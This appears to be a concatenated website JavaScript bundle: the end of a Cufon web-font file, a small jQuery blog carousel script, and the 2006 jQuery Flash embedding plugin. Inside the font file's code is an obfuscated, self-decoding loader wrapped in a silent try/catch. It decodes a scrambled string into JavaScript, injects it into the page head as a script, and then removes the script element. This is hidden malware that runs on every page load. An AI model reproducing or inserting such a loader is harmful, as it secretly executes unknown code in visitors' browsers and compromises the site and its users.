,"o":17,"i":5,"e":17,"a":19,"J":-10,"A":24,"\/":-3,".":17,",":17}},{"d":"229,40r-68,0r-15,-40v-75,17,-133,-9,-115,-131v15,-104,76,-136,129,-136v53,0,104,27,86,136v-9,56,-37,90,-58,109xm188,-131v13,-81,-1,-108,-33,-108v-32,0,-55,27,-67,108v-13,89,0,114,48,105r-22,-63r32,0r22,35v4,-5,12,-26,20,-77","w":234,"k":{"A":24,"\/":-22}},{"d":"239,0r-114,0r4,-24v19,-4,20,-8,12,-29r-21,-51v-15,22,-35,43,-46,68v-1,5,1,12,13,12r-3,24r-83,0r4,-24v19,0,31,-14,40,-26r63,-80r-37,-82v-6,-14,-13,-27,-30,-27r4,-23r109,0r-4,23v-17,1,-20,14,-14,27r20,44v13,-20,34,-35,42,-60v1,-5,-3,-11,-13,-11r4,-23r80,0r-4,23v-18,0,-29,13,-41,27r-57,68r44,94v6,13,18,26,31,26","w":229,"k":{"y":5,"v":14,"u":22,"t":17,"s":5,"p":7,"o":26,"m":10,"e":26,"d":19,"c":17,"a":3,"U":10,"S":5,"Q":19,"O":22,"G":19,"C":19,"A":10,"\/":-41,"-":24}},{"d":"237,0r-84,0r-55,-121v-3,30,-16,60,-10,90v3,5,8,7,13,7r-4,24r-93,0r4,-24v12,1,22,-15,23,-26r26,-163v4,-12,-6,-27,-15,-26r4,-23r93,0r-4,23v-29,5,-25,51,-32,80v21,-23,49,-41,65,-69v1,-6,-3,-11,-9,-11r4,-23r93,0r-4,23v-51,12,-73,53,-111,78r65,111v7,12,15,27,35,26","w":216,"k":{"z":-14,"y":5,"w":7,"v":5,"u":5,"t":3,"s":-14,"r":7,"p":12,"o":7,"n":7,"l":-7,"k":-7,"h":-7,"e":12,"b":-17,"a":-11,"Z":-3,"Y":24,"X":-5,"W":14,"V":26,"U":17,"T":-3,"S":3,"R":-7,"Q":10,"P":-12,"O":19,"N":-3,"M":-5,"L":-7,"K":-10,"J":-19,"I":-5,"G":10,"F":-3,"E":-3,"D":-5,"C":10,"B":-7,"A":24,";":-22,":":-22,"\/":-54,".":-24,"-":26,",":-22,"!":-24}},{"d":"172,-113r-55,0r-11,68r-27,0r11,-68r-56,0r6,-35r55,0r11,-67r28,0r-11,67r55,0","w":168},{"d":"115,-272r-105,295r-30,0r103,-295r32,0","w":63,"k":{"z":-5,"x":-5,"u":-10,"s":-3,"q":5,"o":7,"k":-14,"h":-19,"Z":-12,"Y":-22,"X":-24,"W":-22,"V":-22,"U":-14,"T":-26,"S":-10,"R":-19,"Q":5,"P":-26,"O":1,"N":-24,"M":-24,"L":-26,"K":-26,"J":-19,"I":-24,"H":-22,"G":-10,"F":-22,"E":-26,"D":-26,"C":-10,"B":-29,"A":3,"9":-12,"8":-10,"7":3,"6":-7,"5":-5,"4":3,"3":-5,"2":-12,"1":12,"0":-5}},{"d":"103,-267r-28,96r-21,0r3,-96r46,0","w":74,"k":{".":96,",":94}},{"d":"142,-239v-17,1,-19,10,-17,26r15,151r68,-166v1,-5,-4,-11,-13,-11r3,-23r72,0r-4,23v-13,0,-23,9,-31,26r-93,213r-51,0r-29,-213v-3,-21,-12,-26,-23,-26r4,-23r103,0","w":227,"k":{"z":19,"y":10,"v":10,"u":19,"t":10,"s":24,"r":14,"p":17,"o":31,"m":14,"i":7,"g":26,"e":36,"a":29,"Z":7,"W":-5,"S":10,"Q":19,"O":19,"G":17,"C":17,"A":46,";":17,":":17,"\/":12,".":55,"-":22,",":55}},{"d":"238,-136v-14,89,-57,136,-136,136r-97,0r4,-24v12,1,22,-15,23,-26r26,-163v3,-12,-4,-27,-15,-26r4,-23r94,0v79,0,111,39,97,126xm180,-136v14,-84,-18,-112,-64,-92r-29,176v-3,16,8,26,21,26v32,0,59,-34,72,-110","w":225,"k":{"Z":12,"Y":29,"X":24,"W":24,"V":24,"U":7,"T":10,"R":5,"Q":-3,"P":7,"O":-3,"N":7,"M":10,"L":7,"K":7,"J":3,"I":5,"H":7,"G":-5,"F":10,"E":5,"D":10,"C":-5,"B":5,"A":24,";":-3,":":-3,"\/":-7,".":24,"-":-14,",":24}},{"d":"172,-13v0,0,-23,17,-46,17v-21,0,-27,-16,-27,-16v0,0,-21,17,-43,17v-28,0,-49,-21,-43,-63v9,-56,57,-69,98,-69v3,-19,9,-43,-18,-43v-21,0,-26,14,-29,34r-26,0r8,-56v0,0,19,-9,55,-9v37,0,74,14,65,68r-14,83v-5,20,12,17,17,11xm80,-30v34,0,17,-44,27,-70v-28,0,-35,23,-38,39v-3,17,-1,31,11,31","w":154,"k":{"z":-12,"y":7,"x":-5,"w":10,"v":7,"t":3,"s":-14,"r":-7,"j":-10,"i":-7,"f":-10,"\/":-43,".":-14}},{"d":"99,0r-93,0r4,-24v11,1,20,-15,22,-26r27,-163v3,-12,-4,-27,-15,-26r4,-23r93,0r-4,23v-10,-1,-21,15,-23,26r-26,163v-2,12,3,27,15,26","w":104,"k":{"z":3,"y":5,"w":7,"v":10,"t":7,"s":3,"q":10,"p":7,"o":10,"m":3,"l":-10,"g":5,"e":7,"d":7,"c":7,"b":-5,"a":10,"Z":3,"T":-3,"S":-3,"N":3,"M":3,"J":-7,"I":-7,"F":-5,"D":-5,"B":-5,"\/":-19}},{"d":"257,-239v-12,-1,-23,15,-24,26r-34,213r-40,0r-79,-193r-23,143v-4,12,4,27,15,26r-4,24r-64,0r4,-24v12,2,22,-15,23,-26r27,-169v1,-11,-4,-21,-16,-20r4,-23r75,0r67,167v4,-45,22,-91,17,-136v-4,-6,-9,-8,-13,-8r4,-23r64,0","w":220,"k":{"y":5,"u":7,"o":14,"g":10,"e":14,"a":12,"Z":7,"Y":7,"X":7,"W":5,"T":-5,"A":19,"\/":-7,".":14,",":14}},{"d":"120,-250v-3,39,-68,46,-61,0v3,-40,68,-48,61,0xm95,0r-90,0r3,-24v11,1,23,-15,23,-26v0,-38,16,-75,17,-113v-1,-6,-14,-2,-20,-3r4,-20r66,-17r10,6r-23,147v-3,12,4,27,14,26","w":97,"k":{"y":5,"w":7,"v":7,"t":7,"p":5,"\/":-29}},{"d":"186,0r-182,0r4,-24v12,2,22,-15,23,-26r26,-163v4,-12,-6,-27,-15,-26r4,-23r174,0r-11,69r-26,0v6,-35,-3,-42,-41,-42v-45,0,-29,55,-40,88v26,1,36,-4,43,-41r23,0r-16,104r-23,0v5,-34,-6,-39,-31,-38r-12,74v-2,13,6,22,21,22v46,0,56,-9,64,-55r28,0","w":189,"k":{"\/":-22,".":-7,"-":3}},{"d":"167,-218v-13,4,-74,-9,-78,-14r6,-41v20,-10,19,8,38,23v23,18,46,6,34,32","w":182},{"d":"153,-10v0,0,-24,15,-64,15v-40,0,-79,-19,-67,-103v16,-108,99,-113,158,-92r-8,50r-27,0v3,-19,-5,-32,-22,-32v-22,0,-37,23,-45,74v-8,50,2,72,20,72v18,0,31,-13,35,-37r28,0","w":156,"k":{"z":-5,"u":-5,"t":-5,"s":-7,"r":-5,"p":-6,"n":-6,"m":-6,"l":-3,"k":-3,"j":-7,"i":-8,"h":-3,"g":-5,"f":-7,"c":-3,"b":-3,"\/":-23}},{"d":"179,-146r-142,0r6,-34r142,0xm169,-82r-142,0r5,-35r143,0","w":168},{"d":"209,-78v-18,101,-107,74,-205,78r4,-24v11,0,22,-15,23,-26r26,-163v4,-12,-5,-27,-15,-26r4,-23v73,4,183,-21,169,59v-7,43,-43,60,-66,60v28,0,69,13,60,65xm158,-198v9,-40,-30,-42,-44,-30r-11,75v36,3,46,-8,55,-45xm151,-78v6,-36,-17,-48,-53,-45r-12,75v-2,13,1,22,17,22v23,0,42,-17,48,-52","w":202,"k":{"y":5,"w":10,"u":5,"r":7,"o":3,"l":7,"Z":12,"Y":36,"X":24,"W":29,"V":36,"U":22,"T":10,"S":3,"R":12,"Q":7,"P":10,"O":7,"N":14,"M":14,"L":12,"K":12,"J":12,"I":12,"H":10,"G":5,"F":7,"E":12,"D":12,"C":5,"B":12,"A":24,"\/":-12,".":10,"-":-12,",":14}},{"d":"49,-157v2,-12,-11,-9,-21,-9r4,-20r66,-17r11,6r-4,20v0,0,17,-24,49,-24v30,0,62,23,49,103v-17,106,-78,117,-125,89v-2,20,-14,55,12,57r-4,23r-93,0r4,-23v10,0,21,-15,23,-26xm147,-98v8,-51,-1,-67,-18,-67v-22,0,-30,30,-32,42r-13,81v0,0,1,15,23,15v18,0,32,-21,40,-71","w":193,"k":{"y":7,"x":5,"w":7,"v":7,"t":5,"p":7,"l":5,"k":7,"h":7,"c":-5,"\/":-14}},{"d":"175,-77v-11,47,-39,82,-97,82v-30,0,-57,-8,-57,-8r10,-63r29,0v-5,29,3,43,20,43v17,0,32,-15,38,-52v5,-31,-4,-52,-28,-52v-20,0,-40,10,-40,10r23,-145r118,0r-18,61r-86,0r-7,48v53,-16,110,12,95,76","k":{"9":29,"8":26,"7":55,"6":22,"5":39,"4":24,"3":36,"2":36,"1":61,"0":17,"\/":3,".":26,"-":12,",":26}},{"d":"103,-156v-3,42,-70,50,-63,0v2,-41,70,-49,63,0xm81,-23v-6,37,-33,81,-33,81r-25,0v0,0,15,-29,19,-50v9,-49,-23,-2,-20,-54v1,-18,18,-29,33,-29v16,0,32,11,26,52","w":93},{"d":"248,-70v-9,57,-41,75,-64,75v-23,0,-50,-16,-41,-75v9,-57,41,-75,64,-75v23,0,51,15,41,75xm238,-267r-160,267r-29,0r160,-267r29,0xm143,-193v-9,57,-41,75,-65,75v-23,0,-50,-15,-40,-75v9,-57,42,-74,65,-74v23,0,50,15,40,74xm213,-70v7,-42,2,-57,-9,-57v-12,0,-18,15,-25,57v-7,42,-5,56,7,56v11,0,20,-14,27,-56xm108,-193v7,-42,4,-56,-8,-56v-12,0,-20,14,-27,56v-7,42,-3,57,8,57v12,0,20,-15,27,-57","w":236},{"d":"170,-111r-18,0r-44,-90r-73,90r-17,0r86,-156r30,0","w":151}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+312-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("h*FUd{->GyS#hlwV){,cC*CSO:-UF{S#O:%cGy=`FuLtEI>apI%wY:C:hy=FyU>eQ2SQ)2,-)w)?Pe=NWO_]C*EZOo?[4*2[)O7RFUSfPu[a-UNYdu8N.*NcGIN0xO[0?I7[m*^{Pc>#hRYIGw?1xR-*yRB=y2tMOlL`uR=ZQ?_B=yzep?%[-mtwOaC#YfztGO!0CaCB.*RS4lN[pyC#YlNtpO8#d*u#Ff=0.*YSEa_{.{)tPOz0YIUVWmTBFaZa.{SMpQSPh+L()f)fOl^Bpc7Kx`=0Y{uZFo-I)owtGy_`Ol_Tdf%wEf%wEO=B){w>Pu[#E:S8zl+2,*oC%h.4-xp!=Qm?uyOEFGdY)PW7ZaeRw{`0BgMtT#][NcI>U:f^_(VLS1KY.`uMWo=0Y{uZFo-I)owtGy_`Ol_edU[#)yTL)*ZcFy,RYU[#dy-Y.{N]E:,thQ!]GQ_>FO->h*N]E:,>GyS#.{Z]Yf=#EyUwhQw{dfC0x:RLd+tMh:RBFUTey:w)OmU[y:w)WQR0hQ87")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":184,"face":{"font-family":"TFArdent","font-weight":700,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-45 -283.068 374 80","underline-thickness":"4.68","underline-position":"-29.88","slope":"-12","stemh":"24","stemv":"24","unicode-range":"U+0020-U+007E"}}));



/* Source File: mc.js */

var maxBlog = 0;

$(document).ready(function(){
  var curBlog = 1;
  var loading = false;
  if(maxBlog > 4) {
    maxBlog = 4;
  }
  
  $('.leadBlog .scan .p').click(function(){
    if(!loading && maxBlog > 0){
      loading = true;
      if(curBlog > 1){
        curBlog--;
      } else{
        curBlog = 1;
      }
      $('.leadBlog ul').animate({marginLeft: ((1 - curBlog) * 475) + 'px' }, 500, function(){
        loading = false;
      });
    }
    return false;
  });
  
  $('.leadBlog .scan .n').click(function(){   
    if(!loading && maxBlog > 0){
      loading = true;  
      if(curBlog < maxBlog){
        curBlog++;
      } else{
        curBlog = maxBlog;
      }
      $('.leadBlog ul').animate({marginLeft: ((curBlog - 1) * -475) + 'px' }, 500, function(){
        loading = false;
      });
    }
    return false;
  });
  
  $('.pageTextOne a.more').click(function(){ 
    if(!loading){
      loading = true;  
      $('.pageTextHolder').animate({marginLeft: '-360px'}, 500, function(){
        loading = false;
      });
    }
    return false;
  });
  
  $('.pageTextTwo a.back').click(function(){ 
    if(!loading){
      loading = true;  
      $('.pageTextHolder').animate({marginLeft: '0px'}, 500, function(){
        loading = false;
      });
    }
    return false;
  });  
  
});


/* Source File: jquery_flash */


/**
 * Flash (http://jquery.lukelutman.com/plugins/flash)
 * A jQuery plugin for embedding Flash movies.
 * 
 * Version 1.0
 * November 9th, 2006
 *
 * Copyright (c) 2006 Luke Lutman (http://www.lukelutman.com)
 * Dual licensed under the MIT and GPL licenses.
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.opensource.org/licenses/gpl-license.php
 * 
 * Inspired by:
 * SWFObject (http://blog.deconcept.com/swfobject/)
 * UFO (http://www.bobbyvandersluis.com/ufo/)
 * sIFR (http://www.mikeindustries.com/sifr/)
 * 
 * IMPORTANT: 
 * The packed version of jQuery breaks ActiveX control
 * activation in Internet Explorer. Use JSMin to minifiy
 * jQuery (see: http://jquery.lukelutman.com/plugins/flash#activex).
 *
 **/ 
;(function(){
    
var $$;

/**
 * 
 * @desc Replace matching elements with a flash movie.
 * @author Luke Lutman
 * @version 1.0.1
 *
 * @name flash
 * @param Hash htmlOptions Options for the embed/object tag.
 * @param Hash pluginOptions Options for detecting/updating the Flash plugin (optional).
 * @param Function replace Custom block called for each matched element if flash is installed (optional).
 * @param Function update Custom block called for each matched if flash isn't installed (optional).
 * @type jQuery
 *
 * @cat plugins/flash
 * 
 * @example $('#hello').flash({ src: 'hello.swf' });
 * @desc Embed a Flash movie.
 *
 * @example $('#hello').flash({ src: 'hello.swf' }, { version: 8 });
 * @desc Embed a Flash 8 movie.
 *
 * @example $('#hello').flash({ src: 'hello.swf' }, { expressInstall: true });
 * @desc Embed a Flash movie using Express Install if flash isn't installed.
 *
 * @example $('#hello').flash({ src: 'hello.swf' }, { update: false });
 * @desc Embed a Flash movie, don't show an update message if Flash isn't installed.
 *
**/
$$ = jQuery.fn.flash = function(htmlOptions, pluginOptions, replace, update) {
    
    // Set the default block.
    var block = replace || $$.replace;
    
    // Merge the default and passed plugin options.
    pluginOptions = $$.copy($$.pluginOptions, pluginOptions);
    
    // Detect Flash.
    if(!$$.hasFlash(pluginOptions.version)) {
        // Use Express Install (if specified and Flash plugin 6,0,65 or higher is installed).
        if(pluginOptions.expressInstall && $$.hasFlash(6,0,65)) {
            // Add the necessary flashvars (merged later).
            var expressInstallOptions = {
                flashvars: {      
                    MMredirectURL: location,
                    MMplayerType: 'PlugIn',
                    MMdoctitle: jQuery('title').text() 
                }                    
            };
        // Ask the user to update (if specified).
        } else if (pluginOptions.update) {
            // Change the block to insert the update message instead of the flash movie.
            block = update || $$.update;
        // Fail
        } else {
            // The required version of flash isn't installed.
            // Express Install is turned off, or flash 6,0,65 isn't installed.
            // Update is turned off.
            // Return without doing anything.
            return this;
        }
    }
    
    // Merge the default, express install and passed html options.
    htmlOptions = $$.copy($$.htmlOptions, expressInstallOptions, htmlOptions);
    
    // Invoke $block (with a copy of the merged html options) for each element.
    return this.each(function(){
        block.call(this, $$.copy(htmlOptions));
    });
    
};
/**
 *
 * @name flash.copy
 * @desc Copy an arbitrary number of objects into a new object.
 * @type Object
 * 
 * @example $$.copy({ foo: 1 }, { bar: 2 });
 * @result { foo: 1, bar: 2 };
 *
**/
$$.copy = function() {
    var options = {}, flashvars = {};
    for(var i = 0; i < arguments.length; i++) {
        var arg = arguments[i];
        if(arg == undefined) continue;
        jQuery.extend(options, arg);
        // don't clobber one flash vars object with another
        // merge them instead
        if(arg.flashvars == undefined) continue;
        jQuery.extend(flashvars, arg.flashvars);
    }
    options.flashvars = flashvars;
    return options;
};
/*
 * @name flash.hasFlash
 * @desc Check if a specific version of the Flash plugin is installed
 * @type Boolean
 *
**/
$$.hasFlash = function() {
    // look for a flag in the query string to bypass flash detection
    if(/hasFlash\=true/.test(location)) return true;
    if(/hasFlash\=false/.test(location)) return false;
    var pv = $$.hasFlash.playerVersion().match(/\d+/g);
    var rv = String([arguments[0], arguments[1], arguments[2]]).match(/\d+/g) || String($$.pluginOptions.version).match(/\d+/g);
    for(var i = 0; i < 3; i++) {
        pv[i] = parseInt(pv[i] || 0);
        rv[i] = parseInt(rv[i] || 0);
        // player is less than required
        if(pv[i] < rv[i]) return false;
        // player is greater than required
        if(pv[i] > rv[i]) return true;
    }
    // major version, minor version and revision match exactly
    return true;
};
/**
 *
 * @name flash.hasFlash.playerVersion
 * @desc Get the version of the installed Flash plugin.
 * @type String
 *
**/
$$.hasFlash.playerVersion = function() {
    // ie
    try {
        try {
            // avoid fp6 minor version lookup issues
            // see: http://blog.deconcept.com/2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/
            var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
            try { axo.AllowScriptAccess = 'always';    } 
            catch(e) { return '6,0,0'; }                
        } catch(e) {}
        return new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').replace(/\D+/g, ',').match(/^,?(.+),?$/)[1];
    // other browsers
    } catch(e) {
        try {
            if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
                return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).description.replace(/\D+/g, ",").match(/^,?(.+),?$/)[1];
            }
        } catch(e) {}        
    }
    return '0,0,0';
};
/**
 *
 * @name flash.htmlOptions
 * @desc The default set of options for the object or embed tag.
 *
**/
$$.htmlOptions = {
    height: 240,
    flashvars: {},
    pluginspage: 'http://www.adobe.com/go/getflashplayer',
    src: '#',
    type: 'application/x-shockwave-flash',
    width: 320        
};
/**
 *
 * @name flash.pluginOptions
 * @desc The default set of options for checking/updating the flash Plugin.
 *
**/
$$.pluginOptions = {
    expressInstall: false,
    update: true,
    version: '6.0.65'
};
/**
 *
 * @name flash.replace
 * @desc The default method for replacing an element with a Flash movie.
 *
**/
$$.replace = function(htmlOptions) {
    this.innerHTML = '<div class="alt">'+this.innerHTML+'</div>';
    jQuery(this)
        .addClass('flash-replaced')
        .prepend($$.transform(htmlOptions));
};
/**
 *
 * @name flash.update
 * @desc The default method for replacing an element with an update message.
 *
**/
$$.update = function(htmlOptions) {
    var url = String(location).split('?');
    url.splice(1,0,'?hasFlash=true&');
    url = url.join('');
    var msg = '<p>This content requires the Flash Player. <a href="http://www.adobe.com/go/getflashplayer">Download Flash Player</a>. Already have Flash Player? <a href="'+url+'">Click here.</a></p>';
    this.innerHTML = '<span class="alt">'+this.innerHTML+'</span>';
    jQuery(this)
        .addClass('flash-update')
        .prepend(msg);
};
/**
 *
 * @desc Convert a hash of html options to a string of attributes, using Function.apply(). 
 * @example toAttributeString.apply(htmlOptions)
 * @result foo="bar" foo="bar"
 *
**/
function toAttributeString() {
    var s = '';
    for(var key in this)
        if(typeof this[key] != 'function')
            s += key+'="'+this[key]+'" ';
    return s;        
};
/**
 *
 * @desc Convert a hash of flashvars to a url-encoded string, using Function.apply(). 
 * @example toFlashvarsString.apply(flashvarsObject)
 * @result foo=bar&foo=bar
 *
**/
function toFlashvarsString() {
    var s = '';
    for(var key in this)
        if(typeof this[key] != 'function')
            s += key+'='+encodeURIComponent(this[key])+'&';
    return s.replace(/&$/, '');        
};
/**
 *
 * @name flash.transform
 * @desc Transform a set of html options into an embed tag.
 * @type String 
 *
 * @example $$.transform(htmlOptions)
 * @result <embed src="foo.swf" ... />
 *
 * Note: The embed tag is NOT standards-compliant, but it 
 * works in all current browsers. flash.transform can be
 * overwritten with a custom function to generate more 
 * standards-compliant markup.
 *
**/
$$.transform = function(htmlOptions) {
    htmlOptions.toString = toAttributeString;
    if(htmlOptions.flashvars) htmlOptions.flashvars.toString = toFlashvarsString;
    return '<embed ' + String(htmlOptions) + '/>';        
};

/**
 *
 * Flash Player 9 Fix (http://blog.deconcept.com/2006/07/28/swfobject-143-released/)
 *
**/
if (window.attachEvent) {
    window.attachEvent("onbeforeunload", function(){
        __flash_unloadHandler = function() {};
        __flash_savedUnloadHandler = function() {};
    });
}
    
})();

